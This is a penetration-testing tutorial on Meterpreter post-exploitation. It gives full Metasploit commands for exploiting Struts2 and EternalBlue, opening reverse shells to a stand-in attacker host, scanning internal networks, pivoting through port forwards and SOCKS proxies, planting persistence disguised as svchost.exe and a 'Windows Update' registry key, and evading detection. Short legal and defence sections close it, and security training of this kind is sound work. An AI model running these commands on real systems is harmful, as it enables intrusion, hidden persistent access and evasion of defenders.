Table of Contents
Tutorial Info
Scanning and Port Forwarding Through a Meterpreter Session
Master advanced post-exploitation techniques using Meterpreter for network reconnaissance, pivoting, and establishing persistent access through compromised systems.
Introduction to Meterpreter Post-Exploitation
Meterpreter is one of the most powerful post-exploitation payloads available in the Metasploit Framework. Once you've gained initial access to a target system, Meterpreter provides an extensive set of capabilities for network reconnaissance, lateral movement, and maintaining persistent access.
Legal Warning: This tutorial is for authorized penetration testing and educational purposes only. Only use these techniques on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal.
This tutorial covers advanced techniques for using Meterpreter sessions to scan internal networks, establish port forwarding tunnels, and pivot through compromised systems to reach previously inaccessible network segments.
Meterpreter Session Fundamentals
Establishing a Meterpreter Session
Before diving into advanced techniques, let's review how to establish a Meterpreter session:
# Start Metasploit console msfconsole # Example: Using a web application exploit use exploit/multi/http/struts2_content_type_ognl set RHOSTS target.example.com set LHOST attacker_ip set payload windows/meterpreter/reverse_tcp run # Example: Using a Windows SMB exploit use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 set LHOST attacker_ip set payload windows/x64/meterpreter/reverse_tcp exploit
Session Management
Once you have active sessions, proper management is crucial:
# List active sessions sessions -l # Interact with a specific session sessions -i 1 # Background current session background # Kill a session sessions -k 1 # Kill all sessions sessions -K # Upgrade shell to Meterpreter (if needed) sessions -u 1
Network Reconnaissance Techniques
Internal Network Discovery
The first step in post-exploitation is understanding the network topology:
# Get network configuration meterpreter > ipconfig # Display network interfaces meterpreter > ifconfig # Show network connections meterpreter > netstat -an # Get system information meterpreter > sysinfo # Show running processes meterpreter > ps # Display current user context meterpreter > getuid
ARP Table Analysis
The ARP table reveals recently communicated hosts on the local network:
# View ARP table from Meterpreter meterpreter > arp # Execute system command to view ARP table meterpreter > execute -f cmd.exe -a "/c arp -a" -H # On Linux systems meterpreter > execute -f /bin/bash -a "-c 'arp -a'" -H # Use auxiliary module for network discovery background use auxiliary/scanner/discovery/arp_sweep set RHOSTS 192.168.1.0/24 set SESSION 1 run
Route Discovery and Analysis
# Display routing table meterpreter > route # Windows route command meterpreter > execute -f cmd.exe -a "/c route print" -H # Linux route command meterpreter > execute -f /bin/bash -a "-c 'route -n'" -H # Display network statistics meterpreter > execute -f cmd.exe -a "/c netstat -rn" -H
Port Scanning Through Meterpreter
Internal Network Scanning
Use Meterpreter to scan internal networks that are not directly accessible from your attack machine:
# Background the current session background # TCP port scanner through session use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.0/24 set PORTS 21,22,23,25,53,80,110,443,993,995,1723,3389,5900 set SESSION 1 run # SYN scanner (faster but requires raw sockets) use auxiliary/scanner/portscan/syn set RHOSTS 192.168.1.0/24 set PORTS 1-1000 set SESSION 1 run # Service version detection use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.100 set PORTS 1-65535 set SESSION 1 set THREADS 50 run
Stealth Scanning Techniques
Implement stealth techniques to avoid detection during scanning:
# Use built-in Windows tools for stealth scanning
meterpreter > execute -f cmd.exe -a "/c for /L %i in (1,1,254) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is alive" -H
# Port scanning with netcat through Meterpreter
meterpreter > upload nc.exe C:\temp\nc.exe
meterpreter > execute -f C:\temp\nc.exe -a "-zv 192.168.1.100 80-443" -H
# PowerShell port scanner
meterpreter > execute -f powershell.exe -a "-Command "1..254 | ForEach {Test-NetConnection 192.168.1.$_ -Port 80 -InformationLevel Quiet}"" -H
# Slow scan to evade IDS
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100
set PORTS 80,443,22,21
set DELAY 5
set SESSION 1
runPort Forwarding and Pivoting
Local Port Forwarding
Forward traffic from your local machine through the compromised host to internal targets:
# Forward local port 8080 to internal web server meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.50 # Forward RDP port for internal Windows machine meterpreter > portfwd add -l 3390 -p 3389 -r 192.168.1.100 # Forward SSH port for internal Linux machine meterpreter > portfwd add -l 2222 -p 22 -r 192.168.1.200 # List active port forwards meterpreter > portfwd list # Delete a specific port forward meterpreter > portfwd delete -l 8080 # Delete all port forwards meterpreter > portfwd flush
After setting up port forwarding, you can access internal services:
# Access forwarded web service curl http://localhost:8080 # Connect to forwarded RDP rdesktop localhost:3390 # SSH to forwarded service ssh user@localhost -p 2222
Reverse Port Forwarding
Allow internal systems to connect back to your attack machine:
# Reverse forward - make attack machine accessible from internal network meterpreter > portfwd add -R -l 4444 -p 80 -r attacker_ip # This allows internal machines to connect to port 4444 on the compromised host # and reach port 80 on the attacker machine # Example: Setting up a reverse HTTP server # On attacker machine, start HTTP server python3 -m http.server 80 # Internal machines can now access: http://compromised_host:4444
Dynamic Port Forwarding (SOCKS)
Set up a SOCKS proxy for flexible traffic routing:
# Background the session background # Start SOCKS proxy use auxiliary/server/socks_proxy set SRVPORT 1080 set VERSION 5 run -j # Configure proxy in session sessions -i 1 run autoroute -s 192.168.1.0/24 # Now configure your tools to use SOCKS proxy at localhost:1080 # Example with proxychains echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf proxychains nmap -sT 192.168.1.0/24
Advanced Tunneling Techniques
Using Autoroute for Pivoting
Autoroute automatically configures routing to access remote networks:
# Add route through Meterpreter session meterpreter > run autoroute -s 192.168.1.0/24 # Add multiple networks meterpreter > run autoroute -s 10.10.10.0/24 meterpreter > run autoroute -s 172.16.0.0/16 # View current routes meterpreter > run autoroute -p # Delete a route meterpreter > run autoroute -d 192.168.1.0/24 # Background session and use auxiliary modules background use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.0/24 set PORTS 80,443,22,21,25 run
SOCKS Proxy Configuration
Configure applications to use the SOCKS proxy for accessing internal networks:
# Configure browser to use SOCKS proxy # Firefox: Network Settings -> Manual proxy configuration # SOCKS Host: 127.0.0.1, Port: 1080, SOCKS v5 # Use with command-line tools # With curl curl --socks5 127.0.0.1:1080 http://192.168.1.100 # With wget wget --proxy-user= --proxy-password= --http-proxy=127.0.0.1:1080 http://192.168.1.100 # Proxychains configuration echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf proxychains firefox proxychains nmap -sT 192.168.1.0/24
Maintaining Persistent Access
Service-Based Persistence
Establish persistence using Windows services:
# Create persistent service meterpreter > run metsvc # Manual service creation meterpreter > upload payload.exe C:\windows\temp\svchost.exe meterpreter > execute -f sc.exe -a "create MyService binPath= C:\windows\temp\svchost.exe start= auto" -H meterpreter > execute -f sc.exe -a "start MyService" -H # Background and set up handler for persistent connection background use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST attacker_ip set LPORT 4445 run -j
Registry Persistence
# Add registry persistence meterpreter > run persistence -U -i 5 -p 4445 -r attacker_ip # Manual registry modification meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v "Windows Update" -t REG_SZ -d "C:\windows\temp\payload.exe" # View registry entries meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v "Windows Update"
Detection Evasion Techniques
Implement techniques to avoid detection by security monitoring systems:
Traffic Obfuscation
- HTTP/HTTPS tunneling: Use web traffic to hide command and control
- DNS tunneling: Exfiltrate data through DNS queries
- Timing attacks: Vary connection intervals to avoid pattern detection
- Process migration: Move to legitimate processes to avoid suspicion
# Migrate to a legitimate process meterpreter > ps meterpreter > migrate 1234 # Use encrypted payloads use payload/windows/meterpreter/reverse_https set LHOST attacker_ip set LPORT 443 # Set up domain fronting (advanced) set HttpHostHeader legitimate-domain.com set HttpServerName cdn.cloudfront.net
Defense and Detection Strategies
Understanding defensive measures helps both in testing their effectiveness and implementing proper security.
Network Monitoring
- Network segmentation: Limit lateral movement between network segments
- Traffic analysis: Monitor for unusual traffic patterns and volumes
- Behavioral analysis: Detect anomalous process and network behavior
- Endpoint detection: Deploy EDR solutions to monitor endpoint activity
- Log correlation: Correlate logs across multiple systems for attack patterns
Preventive Measures
- Patch management: Keep systems updated to prevent initial compromise
- Least privilege: Limit user and service account privileges
- Application whitelisting: Prevent unauthorized executable execution
- Network access control: Implement strict firewall rules and ACLs
- Multi-factor authentication: Protect against credential compromise
Legal and Ethical Considerations
Post-exploitation activities carry significant legal and ethical responsibilities.
Critical Legal Requirements
- • Only perform these activities on authorized systems with proper documentation
- • Post-exploitation activities require explicit scope definition
- • Data exfiltration and persistence may have additional legal restrictions
- • Maintain detailed logs of all activities for compliance and reporting
- • Understand local laws regarding computer intrusion and data access
Penetration Testing Best Practices
- Define clear scope boundaries before beginning post-exploitation
- Document all systems accessed and techniques used
- Minimize impact on production systems and user productivity
- Remove all persistence mechanisms and uploaded files after testing
- Report vulnerabilities promptly with clear remediation guidance
Conclusion
Meterpreter provides an incredibly powerful platform for post-exploitation activities, enabling penetration testers to thoroughly assess network security and demonstrate the potential impact of successful attacks.
The techniques covered in this tutorial - network reconnaissance, port forwarding, and persistent access - represent core capabilities that attackers use in real-world scenarios. Understanding these methods is essential for both offensive security professionals and defenders.
Practice Safely: Set up isolated lab environments to practice these techniques safely and legally. Consider using platforms like HackTheBox, TryHackMe, or building your own virtual lab infrastructure.